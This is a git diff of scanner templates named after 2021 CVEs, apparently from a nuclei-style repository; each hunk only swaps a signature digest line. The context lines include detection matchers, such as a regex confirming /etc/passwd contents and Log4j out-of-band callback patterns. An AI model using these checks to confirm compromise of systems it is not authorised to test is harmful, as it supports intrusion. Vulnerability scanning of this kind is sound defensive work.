100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_1, "{\"status\":\"success\"}")' - 'contains(body_2, "Welcome to Simple Client")' condition: and -# digest: 4a0a00473045022100c18c3e42f0e093b790d4012af7e8872c0ded4c1bd1f756b349e64aecbf26c3f802204b2f781d8ce495d24c568095c35a1dc6276120bc72b5cd525b88d324e2f22a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220262f6dbab5aa11df2d3b7b3f71f2a40c2f061bca4fa2e783b2570300c20e328b022100f63706d6260205efd9fc14c89b8b17c1d87cdbd1c544997adb18b93bfc3afbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index fa5d8ee81e..20a7c40ec6 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -59,4 +59,4 @@ http: - 500 - 403 condition: or -# digest: 4a0a0047304502203424ac89c9d515601d84bd5d04d987db9f23d90761f8cb77433d965d2382a1bf022100a2dcb2c7b1c8281ba00a17246312fc353a01b546c7af31c8d5409dcffba3baed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f705a6aae88335620af088599ebed27625e3e46caf952bab2a320688df01cf5c022100f9a8a8d4f4cd062bffd80ea3493e2b6e85e209824e278f3b7d62619174083e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index b28dd57297..d3b18de76c 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205990eb03c07bff8f95196ad94df022af52861c263d536dd6b7b5ae0436a0ad3602204a494ff4ceba8fa187c7ad4c5520568c3d8a628919832050610396b57e6ac9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a32a805b26b2f28db0ebabd7a780eee017ecff6957e00616a43b00c062ba231502205f2fe8e68648e6b4aec358570005a88497189826988ddc5683f6df0961ea5d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 1ecbf05be4..aac18356c8 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6e3ec97201705f04b5dbb40a063537ca5bfa1325d42d747edb2da45d6d9f51d022100bd70aa78d05d2f6a1e3ea1033983c9a374566efe44d8d930e10297a2b6cacfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff571572d59488430e0f0e46235af01ae322d987ab4e6d6c5ea12094d438483b02203207ab5bdea3f11504cce1805418b4b11dcc570e1fd427df104363775d78d551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index b3a453604c..cb896b02da 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022001be70fb443486c712120703936560a196126da58c1afc837570c82f4c35ec9802206eec0fba2e411b7d3cbf0b9bb15509191727d985e2f586884f060ab322a41b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0bdee0699e5c10cd4af579494659079fcd7fc2165ddb58644c24ec315a043f702200460743342594ef8d5f4fe70a83be35043df22ff4a69370c350effcc24c24183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 225c8a64e7..a32006f43a 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201c254e7acbf815b78d55849a20c8fe64f4f709c2f3048a9786e99415864e2b71022010a85fbec38c92868fe06464552f78b5d338d127859944ee676b435c76c75834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006e969ce9263f4a3e3db8029312a1cedfb5f6b51e452ef014080e879485508c7022100c9f3a7b14ebabee62df5310b48d15f491a8ee89a97fd4cd675b859a4ae26d546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index b191ba1008..27d6049c8d 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100953a61bb137c40872ac341046a3d349378dfe44509b0bf81b8dea18ef859cc9402206cb18380503695b43cd279e399ef8aaa40547d01d55325928f48b3e8ed5a395b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f55f2788a37c785e9107ae5f7513b2f901b9be94ff5ac898e573b286d0725ae0221009a73e086bfa523be7848ca3061e08aa947e3c230a48ba2b1c979a598794eb753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 0c62873beb..1fa2b68520 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204fd554c182cfd68987b83774e0d8324157c1df50b31b8b690f3527307005225c022100aa4f38455b0e822753606e0952d4f66977be8b5f5d836f09a98635608c2aa9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e51031026454c2aba9ab044439d17865fe5d569efc7fea71173efc4dfb63b4a022100d570787f5b40a650af825ef1d8a4813cc3488e0a9018c5f94f4e2c4b9fb701ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 40f7fdc4c0..608cb87aea 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c60c98522be0dcb467a48ac59d54daa4c485d602be3d0140cb43d80ee6cb25af0221008796b93591cd7c330c1e1a42b6ea2d3a6416eb0f9d75b34687e5b801c5fe4d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dfc82f46979080f52275d61a856c67032779173eb7ab4f02cb3b41b6d2d6e5b022100c940dc9e671f37ffee26ae725400e1fd6d17bc3d7a35c79f2f7c3f998a4a53cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 0447b37050..003fad7886 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -52,4 +52,4 @@ http: - '"success":true' - '"msg":"success"' condition: and -# digest: 4a0a00473045022100915a0413d4a0e3762b9e14a73e8f4cb8f3c54cf2502df74af4712b8ae9414f8f0220093ff4c4ab5598f6f58d92ab9939337b4c20b50e9bb9366495aee4f828e544df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eadb7914d64bb98ffb2e8f027270243e510c589db3395932abc4394a717e2e14022100a90a89798dd6ea107d1f8a30e7dea96df6d758a05bab69f8b22f2b5a313a5929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 4bd251ef2b..8db490ca6e 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058e22ef0825a67c256b8ecf58ad3a8f63a5ad803c913a95fe044aec1ad6fa0ce02206c27f104f770caf2f1ccb7838363f0f223d12ae87a31497c048909a401041448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22c092d9cee3316ecc435afc5ec64b74493d1ff5c6cc276e03708c3d434f336022100f0d0b9f9f6f4f9fed61ac6b2c0bc88b1257206c8b0d74955d368cf1616aab6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 59dd52d4bf..182403b1ae 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -81,4 +81,4 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request # digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950 -# digest: 4b0a0048304602210084698cf1b66904e70ba57f9830ea545aaaabc4f6405625b3bd6b1ec6cf5c1518022100dc522d39d9ae7cd427c7125c8abb4ef8b906cd1af06f21c1c9a877bcb1c575d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c401dcfe6f3c1f07d0e14f59b9d5fbfcc5aae8f5549cbf78d618770e410646b022040081c8a73749310437cd2795c22e2de2ea525e182d25ca46f81d8add2d0970c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index a4e3199f66..bcc3325cfb 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e62eb05aae4bbf46183dd117efa4ce53246dbebd71db8d75f2d9d591b4af0d80220279da227b3055d4c2492642f5c94a4bdf582eecf34468d05a4edf1f90a47dc60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043a5881def01f2e861569e2e5808346f3edbd4a23e80de269808feae1e0604a4022100d0a11e64690396b53c146e6dfce89875b06dbb6c79f3ea1d02f08dc25443f8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index cb07051a21..68ab110e4d 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -74,4 +74,4 @@ http: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body -# digest: 4b0a004830460221009d940f8a0982384e8bd0f850c06b5915e9aa203c5b4669b9d3b9e045fcc843a0022100dbed9cb50c63e171e7e20611b8677090df662b13a2be3d56ee8b3c8c17ae7bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220176fb89ec397b980e0ea26b87b815baa059d323de3337a8ec24e2e8c0a0cf15c02200bf16edd4b919cf25c6319ccc3019ee169d54b7a91c0c242d9465cdfa96f030f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 2b65a83f4b..de935da98c 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068d48f3ed1b18a18f6d8a7aab9d329d2ef1ab59ae7975558fcc658030c86758602202beae5f2b5f2ef43937f43f3cbf3feb749df245d2e841fa8df5963b2c96ae819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088cc9496c36425cadeb76ea850dad7bb090ed0a984a63d2b0e428b8b9c15d4c7022023a9097c12c361205278e5f91692f4ee708b673b2e5c2ae2fe9133245e8ccc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 806752d520..8772a96bbd 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -49,4 +49,4 @@ http: - 302 - 307 - 308 -# digest: 4a0a004730450220187cab3673d4b39970accee9e374de2fc3060696feb954fe8352f18749b67a180221008264d516349f0b29d618482b160d6aceca10d043f5bb2da941e4d0430c7b2bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041a5bfe743ece67393de950b3147a79655a7b85ee8894afbf4efbdc69ce9875802206e5416d29b5b4f879bcd4ba617698831bafe87a57be4bea18453dedc8a9bb98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 5ff5f61408..acf814c089 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b06aa91e93fa728e8a41a045b2854161d0eb822d82d915ecb9f2687386c4dc5d022100de776ca073ce694c73466b106bbbffc3cb0ba13af341d8763ed46690e75822dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206de4940bcfbaeec3cfc158a834aa4d26dabf808d70cfb3d8828e7d6e479c6f620221008dcc9d93a7c83756d8908295da6244aff47e98b5e201bc83e46e9875ae7b7405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 368146cdc7..cfefaeac88 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7dc8f0dffb6a6773bdef50c0f724379ca714d56e958c6c43e4e62c5ffc62b1e022100817418a132a87c241bad381be7be975d287769f4d75e9b4956b0a201307e8322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f57ba66b5efa0d02b663aacc3cc75a860926d701b4dced4cb98484fe18728af02205b06b852f41886fed8171fbdbf43e4f4114eb6fb07688bde3f77d996a3da78b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 5fc3d34144..ac8ea39e8d 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017e40b46cbbaa8ee5f83e32d2c0e632634e3f663ad7c01d73fd33f979341f545022100baded2daac0b3fdf5ae7695dbe10f0d1dd9e1f1732db69b57acdf04317209f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f51c32131f54757336dd8dbfc3c9b407b605a60b7031b50ab3bcd3766dfdc14022100c7707d27db0cd3a80abba289bded6cf51b5344c85e4e452d8b808ec28e5651b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 51c20778b8..00890242c8 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -74,4 +74,4 @@ http: - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output part: interactsh_request # digest: 4a0a0047304502204a840a21336953401491afca41b378a09a1f91d1a9ddcc3730006d76b55739e1022100daab695f729353f232cefc195d1664d48a955e22a6c539731cf0eecf2718fdb9:922c64590222798bb761d5b6d8e72950 -# digest: 4a0a0047304502204eb9ca6738093def1e2cc010f3df4e82705c0c43cfb3cb3425d5871d348515ac0221009e9fa7ca46f186fafcdc8dcea3de1b7d8ba9f549df7cac6f7aa9f127a9e4ba61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bbc248c30ddbcce2c3bf459db4fe261ec0b250ecda209ee08c2a743e484fcbc022100b2e34ca642f580dce7cc489ab52e7c90d58c61407224d2c63e9264c35d912117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 567d6543ce..5a1d2493a8 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -43,4 +43,4 @@ http: - ".*vpath.*" - "thinfinity" condition: and -# digest: 4b0a00483046022100c73959ff2e4102e8f006d70e29caa4b98cecf3ce80914939bd7da6557f41e6d7022100df8e6ecda681fa3485716ca7d2672281e07a53b82f6c4a3e3e023bb40bd29415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb84742ce2f98cb5dc9e3e6c941a2e2bf6b3f29a3f01b73885699170e1e40ef002206f2bbef6532d0eb5149236a1fada5da49ba3d92a8e601fb0f991e18a858c352b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index e2b4786a79..d641dce0c5 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022014b3e39d19a975739d881f2d173c53050a43a15247eef092bc780b944e70f735022100c14dab355b7a0757b760b95b2a0499f2bc8027dacbc8d90a7416268f7b9337a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027a897964026aebab54d105b9661c1c5ec7ff9f3cd89da2b6203bedbb09a0b2802205a20c9ceeac1c9b798e70174052c0a43c78b9691420a248137026b44288c2efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index c01d93a1ec..9564be3d8b 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095fb129387d2b75f24feb79d00dc66407bed270925edc21aeb695b57da802aa3022100d997d277507209d0a025e2218c2163a0ee055aeaf4ac0bc3483b84243f1654af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d866b4bf394249189039df296942e181b1d17de0da9977db18eb26ca96e416bb022100e7e0b2ab0d85ca71feeadebfe223cfbfe8df03b957b24e56b5b6f8f5e25de82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 51e22bf04a..cd53d1b650 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068316f007e113dc8f5ce8caa988eaceef8d1319bd87ee633a4601468df62f99c022100899fb7ae174b0f95a1e490e8d0c653245e1d6bb3a5598c41d1b0453029b41445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cd0273b0b4112a3101fe3bcfc0632d7d0e2030b68ecb66ca77a8fe879c63c2002206d979b7b19b1736268dcb83a8e0df7b58b84d3ac98cdd4a1c6886a485b64219e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 8df5882955..6f5e1a666f 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -53,4 +53,4 @@ http: - 'status_code_1 == 404 && status_code_2 == 201' - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' condition: and -# digest: 490a004630440220731289291f5a3ad0eb6d9188430902ac5c2ffc770aa6ca643ea9082b2322a88602200b155a601c9353a99db54628cab14b6d69a78a5b59adedca0dd9c7181b9ac3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202718554de68c4dfea45dd175d9bfc340ea2425b0a8462130ba0953be4c1e639a022100f1ddc7a753fcf66912b2e484b36bca1e71c869f04023b7686722e43a182521d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 1ebc42dac4..7aaf461e20 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -45,4 +45,4 @@ http: dsl: - "status_code_2 != status_code_1" condition: and -# digest: 4b0a00483046022100c598b609cefe9631f86f0c8ff40939dcfbcf242ba4f352a679b222f481f5a949022100a76b1a153f40e86920865464e993f07338988f50b21d250757313229c3617422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008200ee8e3932d388cd9c9a19d892c6ad5f51c3f48564a2cca1a4985648f3116d02202921b3e5bba285639c908776508b397c7d9b01bc8b72362eceab71436a311b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index f9a8f5f135..361c3b0407 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -122,4 +122,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058af8fe6d1f9965ec14d7c6c5286a65a1d5f6af6b3e70654d97bc2c98d9a35440220479df42905d77ffeacca4e8be0dac74d2a6f8966118c684ba352512ec255b65e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047d63f5826c9b9ceb59d9ed3139a6b530fae5726bf1418cdbe4decff91e8d22202201acab11fdc62c4bfed133b124241b997797189b54ce0170b7bc726d75cfd3b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 15b04806cc..2a0006c50c 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 4b0a00483046022100b9eec9a11d83c3326164d4964a0d88023fb2bddab0fd59c66accb4aba8ab2945022100c2a2c468b82f029867bdb551e31f91155c65447e06d9f4b1eb5e30b0187f786d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdfbccbe0028282fc3c2dbb564bcc6f9032c86fc9962d406721f143cbe4ca9d9022100b646da841b187e28551c31d240db040337c8b497445b34d75ab25d813b17fd62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index 18308c9d1e..67e5f645cf 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 490a0046304402203689cb6cc57186dbcb826dbab2fcc9fc6e9a875e79019b6098a67bc3c76cf393022049cce2da769d9c71050dfae4bf192726ad13c1a1e1103b5d2cfcced045920c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d33475afc2f11ebc93f0b40cf9f2e896d3b3926fd7028fd91c782c8b800941ff02206eaea5796b58ecb4bed9e8dd6fefb54f23ebb25a107d02722a791a5d95fac168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 5990bc2b0f..214a4a9e8e 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 4b0a00483046022100e8b65efddb508cbf3aea482ff31507e9e3e6641381236c36e6851fc1a5c0f8a002210087bc36a39fc2d5ed398850fea8102507d64ad1d975ee8126a309cc61e3d4c148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c04701a4a58a5af597cb699e2c6f8970129c3ad7949d35e5f7a6735762de4f59022077202ead6cc701c23b1f8071f6c27f8a376d9415d208aa9eda9f69db53060852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index dae8fc9b3a..da28a64a04 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -51,4 +51,4 @@ http: dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" -# digest: 4b0a00483046022100c1ca445ac180dadd1e69d6301530124c87c90f3887f499ff62a9465f50591b28022100f37355782797e70cf40f972fd4981b49a66ffd089bebabab6bfecbdaadb33ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220308e436f3812ee2c86e9a0dd3485b0c280de884f4dd058cf64998796bcee5b8f022100e8797ab16b58b8097467f492ff3289fa9a625c6ca05dfa7c2393afad27754b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index bde0d4f672..01d1a435ac 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -40,4 +40,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100fe20ab019ed58034ee55071247995bdc5687525b011466437637201e0749ff3802205e87f35806ee013166ad43614a8dd7b006b0a6c90e18152dc290cb27cf2cdacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070b8dbc3e128ddf0c0fbc3c6d633deff1f27d7b47267e4434d27f076fd057d480220559981b9ea86820937b6c3f92be3767cd232c32a81a80845b72d11c336c14688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 8e74158ab1..f171757e1b 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022064049b6475e2e1c07882c648bc6073d3b85330430ea220bc09d6d5ec2fd36c70022012cb029862b3e9280a675de1f035cadb03edc0183f3770249727c5ec29123b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f42531f553199accb345fbb738d65888d84a2c5938bb6c8960eba8d5ff4f54cc02207e67187126865a8f1e8297e0c7bdde57b31aebe284eb51692c08da5d6c8d1cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 850d47644c..450af2d9b2 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402205bdfc0b516bab2eb09958cee6aa1af03359a0a6ca4b9cde894d5bb42aa11eabf02200dd27a460f7dec5caff036c79e360bf8f119fdd8b550edd102497579a05b4bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f9cb8263cc4a340f2c356f27f694c4ccc555f88d31ea32a1d35e42387cbd5f2022100a66741c5bdf309e684c115d8ce0f88fd0202a7e11f8de10dca60c1ebd339d083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 15773d33ff..0631fadd06 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -46,4 +46,4 @@ http: - 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")' - 'contains(body_2, "{{randstr}}")' condition: and -# digest: 4b0a004830460221009d44d5515a4fb76835428d1562b0032a4103c4d052eb17b59fdef763909d3877022100984b2452c57cffdf5910bd10dc34369ff6d429649ab3225d2c2f08cb4b8ae011:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0da40d59f1fe58d094affd1049fb5fddd02a3c3185bc017818f2502c4f1760022100c680b57f51a63b27f63a39b075843a9f7fb2a2f812184a2d6808386f2c65b5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index c539c1ff19..7ad2c0330a 100644 --- a/http/cves/2021/CVE-2021-46419.yaml 